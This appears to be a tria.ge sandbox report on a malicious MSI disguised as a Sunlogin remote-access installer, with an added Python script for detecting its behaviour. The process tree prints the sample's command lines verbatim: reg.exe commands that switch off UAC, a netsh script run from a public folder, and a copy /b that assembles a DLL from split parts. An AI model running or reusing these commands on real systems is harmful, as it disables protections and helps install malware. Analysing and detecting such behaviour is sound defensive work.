Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    21/11/2024, 02:40

General

  • Target

    c440d1721cb83183eb397171531888556f544659e1640bf974ed55548016ed3c.msi

  • Size

    106.0MB

  • MD5

    13efd06a23bfa0e958907db33d947ff9

  • SHA1

    57b60766072b7037ca5c5d31a23dd57e332421b8

  • SHA256

    c440d1721cb83183eb397171531888556f544659e1640bf974ed55548016ed3c

  • SHA512

    b2a914c5359a636003d3dc45b8be36a8e059f40893f171a845969ab5a791310f6a86337205f775a0ca0807ddc8a6fcf294a6cf64c990ae58bd2466b1954bb3e0

  • SSDEEP

    3145728:8Cc6i9DJclUWcTsPsz+gpvp0lHEavPwsJ+KkKELYfFY:+rDJciusz+gNpUkGP/J+xEfFY

Signatures

  • UAC bypass 3 TTPs 3 IoCs

    Three reg.exe invocations from 7EUMU.bat set ConsentPromptBehaviorAdmin, EnableLUA and PromptOnSecureDesktop to 0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System. This disables UAC prompting outright rather than bypassing a single prompt: ConsentPromptBehaviorAdmin=0 elevates administrators without asking, PromptOnSecureDesktop=0 moves any remaining prompt off the secure desktop, and EnableLUA=0 turns UAC off after the next reboot. The chain descends from the Windows Installer service process (msiexec.exe /V, PID 1936), so the HKLM writes succeed without any prompt.
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 13 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. Here XR.exe runs it as netsh.exe -f C:\Users\Public\Pictures\Ilp7p.xml, a script file dropped outside any system directory. Helper DLLs registered by a netsh script are listed under HKLM\SOFTWARE\Microsoft\NetSh and are loaded on every later netsh invocation, so that key is the one to inspect on a live host.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Gathers network information 2 TTPs 1 IoCs

    Uses a command-line utility to view network configuration (here cmd.exe /c ipconfig /all, spawned by the dropped XR.exe).

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 23 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots. In this trace vssvc.exe and DrvInst.exe (STORAGE\VolumeSnapshot) run at tree level 1 alongside msiexec.exe rather than under the dropped executables, which is consistent with Windows Installer's system-restore checkpoint during the install rather than shadow-copy tampering by the payload.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\c440d1721cb83183eb397171531888556f544659e1640bf974ed55548016ed3c.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1968
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Loads dropped DLL
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding E9D78674C053B69FDFDBADF5D9D0716E
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2488
    • C:\Program Files\Sunlogin\Sunlogin\XR.exe
      "C:\Program Files\Sunlogin\Sunlogin\XR.exe"
      2⤵
      • Executes dropped EXE
      • Modifies data under HKEY_USERS
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:300
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ipconfig /all
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:284
        • C:\Windows\system32\ipconfig.exe
          ipconfig /all
          4⤵
          • Gathers network information
          PID:2980
      • C:\Windows\System32\netsh.exe
        "C:\Windows\System32\netsh.exe" -f C:\Users\Public\Pictures\Ilp7p.xml
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • Modifies data under HKEY_USERS
        PID:632
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\7EUMU.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1288
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
          4⤵
          • UAC bypass
          PID:328
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
          4⤵
          • UAC bypass
          PID:928
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
          4⤵
          • UAC bypass
          PID:1852
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c copy /b C:\Users\Public\Pictures\KAdWo\d867R~18\p+C:\Users\Public\Pictures\KAdWo\d867R~18\w C:\Users\Public\Pictures\KAdWo\d867R~18\nw_elf.dll
        3⤵
        PID:2036
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2948
    • C:\Windows\system32\DrvInst.exe
      DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003E8" "00000000000004A0"
      1⤵
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious use of AdjustPrivilegeToken
      PID:1716
    • C:\Windows\system32\mmc.exe
      C:\Windows\system32\mmc.exe -Embedding
      1⤵
      • Modifies data under HKEY_USERS
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2336
      • C:\Users\Public\Pictures\KAdWo\d867R~18\jdy_client_mini.exe
        "C:\Users\Public\Pictures\KAdWo\d867R~18\jdy_client_mini.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:896
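The process tree above, and the UAC bypass and Netsh Helper DLL signatures it triggers, read naturally as process-creation telemetry. The following is an added example, not tria.ge's or Sunlogin's code: it takes a process list constructed from the Processes section (PIDs as shown, parent PIDs inferred from the tree nesting, command lines copied verbatim) and flags the four behaviours a responder would pivot on: the three reg.exe writes that zero the UAC policy values, the netsh script run from C:\Users\Public\Pictures, the copy /b concatenation that assembles nw_elf.dll from the extensionless parts p and w, and ipconfig /all hanging off a non-Windows binary. The regular expressions, the SYSTEM_DIRS allow-list and the finding labels are my choices; labels reuse the report's signature names where one exists, and the concatenation finding is labelled as having no sandbox signature because the report shows none for it.

```python
"""Triage of a tria.ge-style process tree as structured telemetry (added example)."""
import re
from dataclasses import dataclass

UAC_VALUES = ("EnableLUA", "ConsentPromptBehaviorAdmin", "PromptOnSecureDesktop")

# reg add HKLM\...\Policies\System /v <value> /t reg_dword /d 0 (quotes and the HKLM alias allowed)
RE_UAC = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\SOFTWARE\\Microsoft\\Windows'
    r'\\CurrentVersion\\Policies\\System"?\s+/v\s+(' + "|".join(UAC_VALUES)
    + r')\s+/t\s+reg_dword\s+/d\s+0\b', re.IGNORECASE)
# netsh -f <script>: executes a netsh script; helpers it registers persist under HKLM\SOFTWARE\Microsoft\NetSh
RE_NETSH_SCRIPT = re.compile(r'netsh(?:\.exe)?"?\s+-f\s+"?([^"\s]+)', re.IGNORECASE)
# copy /b part1+part2 target.dll: binary concatenation of split payload parts
RE_COPY_B = re.compile(r'copy\s+/b\s+(\S+(?:\+\S+)+)\s+(\S+\.(?:dll|exe))', re.IGNORECASE)
RE_IPCONFIG_ALL = re.compile(r'ipconfig(?:\.exe)?\s+/all', re.IGNORECASE)
SYSTEM_DIRS = ("c:\\windows\\",)  # assumption: paths here are expected, anything else is worth a look


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Finding:
    pid: int
    signature: str
    detail: str


def _ancestors(proc, by_pid):
    """Parent chain, nearest first; stops at a PID the telemetry does not contain."""
    chain = []
    while proc.ppid in by_pid:
        proc = by_pid[proc.ppid]
        chain.append(proc)
    return chain


def _outside_system(path):
    return not path.lower().startswith(SYSTEM_DIRS)


def triage(procs):
    by_pid = {p.pid: p for p in procs}
    findings, uac_hits = [], {}
    for p in procs:
        if m := RE_UAC.search(p.cmdline):
            uac_hits.setdefault(m.group(1), p.pid)  # first PID that zeroed each value
        if (m := RE_NETSH_SCRIPT.search(p.cmdline)) and _outside_system(m.group(1)):
            findings.append(Finding(p.pid, "Event Triggered Execution: Netsh Helper DLL",
                                    f"netsh script executed from {m.group(1)}"))
        if m := RE_COPY_B.search(p.cmdline):
            findings.append(Finding(p.pid, "Payload assembled from split parts (no sandbox signature)",
                                    f"{m.group(1)} -> {m.group(2)}"))
        if p.image.lower().endswith("ipconfig.exe") and RE_IPCONFIG_ALL.search(p.cmdline):
            # Recon is only interesting when it hangs off something that is not a Windows binary.
            origin = next((a.image for a in _ancestors(p, by_pid) if _outside_system(a.image)), None)
            if origin:
                findings.append(Finding(p.pid, "Gathers network information", f"ipconfig /all under {origin}"))
    if uac_hits:
        # One finding for the set: ConsentPromptBehaviorAdmin=0 removes the admin prompt at once,
        # PromptOnSecureDesktop=0 moves any remaining prompt off the secure desktop, and
        # EnableLUA=0 switches UAC off entirely after the next reboot.
        missing = [v for v in UAC_VALUES if v not in uac_hits]
        detail = ("all of " + ", ".join(UAC_VALUES) + " set to 0") if not missing \
            else "zeroed: " + ", ".join(uac_hits)
        findings.append(Finding(min(uac_hits.values()), "UAC bypass", detail))
    return findings


# Constructed from the Processes section above; parent PIDs follow the tree nesting (assumption).
POLICY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
STAGE = r"C:\Users\Public\Pictures\KAdWo\d867R~18"
SAMPLE = [
    Proc(1936, 0, r"C:\Windows\system32\msiexec.exe", r"C:\Windows\system32\msiexec.exe /V"),
    Proc(300, 1936, r"C:\Program Files\Sunlogin\Sunlogin\XR.exe", r'"C:\Program Files\Sunlogin\Sunlogin\XR.exe"'),
    Proc(284, 300, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe /c ipconfig /all"),
    Proc(2980, 284, r"C:\Windows\system32\ipconfig.exe", "ipconfig /all"),
    Proc(632, 300, r"C:\Windows\System32\netsh.exe",
         r'"C:\Windows\System32\netsh.exe" -f C:\Users\Public\Pictures\Ilp7p.xml'),
    Proc(1288, 300, r"C:\Windows\System32\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\7EUMU.bat"'),
    Proc(328, 1288, r"C:\Windows\system32\reg.exe",
         f"reg add {POLICY} /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F"),
    Proc(928, 1288, r"C:\Windows\system32\reg.exe", f"reg add {POLICY} /v EnableLUA /t reg_dword /d 0 /F"),
    Proc(1852, 1288, r"C:\Windows\system32\reg.exe",
         f"reg add {POLICY} /v PromptOnSecureDesktop /t reg_dword /d 0 /F"),
    Proc(2036, 300, r"C:\Windows\System32\cmd.exe",
         f'"C:\\Windows\\System32\\cmd.exe" /c copy /b {STAGE}\\p+{STAGE}\\w {STAGE}\\nw_elf.dll'),
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"PID {f.pid:>5}  {f.signature}: {f.detail}")
```

The same `triage()` runs unchanged over Sysmon Event ID 1 or EDR process-creation exports once they are mapped onto `Proc`; the parent-chain walk is what separates `ipconfig /all` launched by a freshly installed program from the same command typed by an administrator.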

    Downloads

    • C:\Config.Msi\f76cdaf.rbs

      Filesize

      8KB

      MD5

      749145467efdf90f8e02249981a7bc2b

      SHA1

      6abfee2dea69804e000d922c0762d3d119de745b

      SHA256

      826dc2fc45a2017b9adbdd7152c7c4279ebe272f0b909d5a4400e974c7ff1b54

      SHA512

      ffa95d4f6a96f1a93ed6b989a79194dc7e3e3c05a3eb71f0a1f06c7bec87e310c17797edad49f83357d27efdc2d58a482a510b1f34f7603f790a24959e5ddaf8

    • C:\Program Files\Sunlogin\Sunlogin\cache_21_0

      Filesize

      9.0MB

      MD5

      be5628882d28ba1bdb9850dc4b7e7fa1

      SHA1

      6d37839c4b8ded05c0e8108696e1b794de59a2a8

      SHA256

      def949e97a2a2d2e504f7c85a27a6f2fd44d3a898357398f4aaa7eb033dfb287

      SHA512

      16037fd6ee2bb26e1014e9e69a2ee5d7290ebe5021ed1eedaa5908b73c39cc2ba6f66c553be9a39163b8831e8f519b10009e71fb94ce392c7229541192aa1c39

    • C:\Users\Admin\AppData\Roaming\7EUMU.bat

      Filesize

      392B

      MD5

      30d6eb22d6aeec10347239b17b023bf4

      SHA1

      e2a6f86d66c699f6e0ff1ac4e140af4a2a4637d1

      SHA256

      659df6b190a0b92fc34e3a4457b4a8d11a26a4caf55de64dfe79eb1276181f08

      SHA512

      500872c3f2f3f801ec51717690873194675cb7f32cc4a862c09d90c18638d364d49b0e04c32323f52734e5c806e3503a63ac755c7019d762786a72840123df76

    • C:\Users\Public\Pictures\KAdWo\d867R~18\NH.txt

      Filesize

      179KB

      MD5

      1bd1c65b610003b945e7b9bd7210db2a

      SHA1

      66902e2b5d575c0232eab4576b81daac56a6bbc8

      SHA256

      871814884dd4058d25cc0111fea5bf48da43d7ac6e7b71db166dd3190a116820

      SHA512

      d487bd2beab4e9c44ebbcffab0215b1c2d93ae3feea8130f8cbcafb4b182222e6054c3c7f79c77a6004a67890f3d5e8cc3a39d959c5b3c40249752483ef00928

    • C:\Users\Public\Pictures\KAdWo\d867R~18\jdy_client_mini.exe

      Filesize

      2.6MB

      MD5

      c206388d7a4c81a52cf637a3e0d2acc8

      SHA1

      c927b021d7f4691ac84a7a54a8d3358f02c89ee6

      SHA256

      1dab81c0d0650a673151e90d475722906f6d71421ceaa8f0df9b14d2e36cd9d3

      SHA512

      247d2277b23360db7d9e7794be80290e1148eb03d5b15ef56710c5dfd62b0374cc05a1529889f00f59813a4e1ed00f35358069a3397fafd65f89205268e4f783

    • C:\Users\Public\Pictures\KAdWo\d867R~18\nw_elf.dll

      Filesize

      1.7MB

      MD5

      c17a7b1c4836089c0c73b03b8ada5941

      SHA1

      25629c7994565d12969b36f9b3960bafedd7e20a

      SHA256

      0ef6821b9df8c45c7d817c36bf99cf0057a63bcb5709ffdfd721cc50dcd7afd9

      SHA512

      0b6510127be3014b0b46ed7f4fb48b75bf63b566ae700767115d0e6d26d8e487d0261b19952dc9c0d9946e25d424388b41c7b2f9634c8ff008d9d837de335597

    • C:\Users\Public\Pictures\KAdWo\d867R~18\p

      Filesize

      886KB

      MD5

      2ed406d06efeeea53ba02a605f1d1674

      SHA1

      70085132cb0207b1389581489149c42052ba374b

      SHA256

      7bdd4e0d14aae0653f703b66b8257f6a9c997547d06fb20063cc02929b7cd1b0

      SHA512

      0213c75c9611102a12ccc26e44fffdc7657606da00a6aa98044394a845dbaa25d1e1f987c5963c7db96f965804db29032cd480d15732cbb33a622ba7dc387762

    • C:\Users\Public\Pictures\KAdWo\d867R~18\w

      Filesize

      886KB

      MD5

      a5b68f44e99929a11b6fead500e8ed61

      SHA1

      6dcd1d94e214a3db96c286758c0e2690dddaa977

      SHA256

      fdf58cf91573dfebe3ea25d567b993570ebd5a2f2fd74fd1e22dcd7103ac18b2

      SHA512

      af8c057851ec682047d550d7190d7450f505b848f87aaf6681400acc9a21253321b06de74d7d932cfc1a7a153bc3d13d791c42b365159ae51184c8ec86f201e9

    • C:\Windows\Installer\MSICE18.tmp

      Filesize

      557KB

      MD5

      db7612f0fd6408d664185cfc81bef0cb

      SHA1

      19a6334ec00365b4f4e57d387ed885b32aa7c9aa

      SHA256

      e9e426b679b3efb233f03c696e997e2da3402f16a321e954b54454317fceb240

      SHA512

      25e129cb22aaabc68c42ecf10bb650ac4d0609b12c08703c780572bac7ecf4559fcc49cd595c56ea48cf55260a984cfa333c08307ffb7c62268b03fbecc724b9

    • \Program Files\Sunlogin\Sunlogin\XR.exe

      Filesize

      18.7MB

      MD5

      8fb8044052662077cdc327a12000e3e9

      SHA1

      94a421e07d154fcc6d411d72f7aa9c3f08bd8058

      SHA256

      ef413c1fdf376dbac6bde73240146ea2676ed47d08150f8b744576f4d3bc4dd2

      SHA512

      2258250b048b61a9732b0da0ef2fb4b522158718a6ab6dcba4dc9b545e3954aa93926d033111c4e14cf85c30f7fa236c0453d9cd70a06c6d06e1d6dc197373e3

    • memory/300-53-0x0000000180000000-0x0000000180213000-memory.dmp

      Filesize

      2.1MB

    • memory/300-52-0x0000000180000000-0x0000000180213000-memory.dmp

      Filesize

      2.1MB

    • memory/300-51-0x0000000180000000-0x0000000180213000-memory.dmp

      Filesize

      2.1MB

    • memory/896-70-0x0000000000250000-0x00000000002B9000-memory.dmp

      Filesize

      420KB

    • memory/1936-64-0x000000013F120000-0x000000013F130000-memory.dmp

      Filesize

      64KB

    • memory/1936-37-0x000000013F120000-0x000000013F130000-memory.dmp

      Filesize

      64KB